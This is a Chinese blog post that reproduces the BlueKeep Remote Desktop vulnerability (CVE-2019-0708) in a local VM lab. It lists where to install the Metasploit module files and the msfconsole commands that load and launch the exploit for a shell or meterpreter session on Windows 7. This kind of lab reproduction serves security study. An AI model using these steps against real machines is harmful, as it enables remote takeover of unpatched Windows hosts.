CVE-2019-0708 远程桌面代码执行漏洞复现

发布于 2024-08-16 11:35:50 字数 2729 浏览 7 评论 0

漏洞环境

目标机 IP: 172.16.105.129 攻击机 IP:172.16.105.1

在 mac 下使用 VMware Fusion 安装 Windows7 SP1,下载链接如下: Windows7 SP1 下载链接:ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

注意: 由于目前 exp 只支持如下版本的系统,因此安装其它版本的系统可能无法利用。

打开 win7 的远程桌面功能:

msf 环境准备

下载 https://github.com/rapid7/metasploit-framework/pull/12283/files 中的攻击套件放置文件到 msf 的相应文件夹(如果已存在同名文件,直接覆盖即可)

rdp.rb   ->   /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb   ->   /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb   ->   /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb   ->   /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

漏洞利用

进入 msfconsole 进入以后使用 reload_all 重新加载 0708RDP 利用模块 使用 use exploit/windows/rdp/cve_2019_0708_bluekeep_rce 启用 0708RDP 攻击模块 使用 show options 查看需要配置的选项:

使用默认的 shell

填写配置信息,并执行攻击:

使用 meterpreter 的 shell

注意: 请在两次攻击之间重启目标机,否则会出现攻击失败的现象!

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。
列表为空,暂无数据

关于作者

半透明的墙

暂无简介

0 文章
0 评论
23 人气
更多

推荐作者

回眸一遍

文章 0 评论 0

一心憧憬

文章 0 评论 0

沙与沫

文章 0 评论 0

mb_L9V1seZC

文章 0 评论 0

angellghost

文章 0 评论 0

旧梦荧光笔

文章 0 评论 0

    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文